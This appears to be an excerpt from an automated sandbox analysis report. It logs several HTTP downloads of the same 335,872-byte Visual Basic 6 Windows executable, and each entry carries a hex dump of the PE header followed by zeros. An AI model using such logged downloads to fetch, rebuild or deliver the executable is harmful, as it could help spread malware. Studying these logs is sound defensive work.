4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:56 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:01 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:01 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:02 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:05 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:06 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:01:08 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
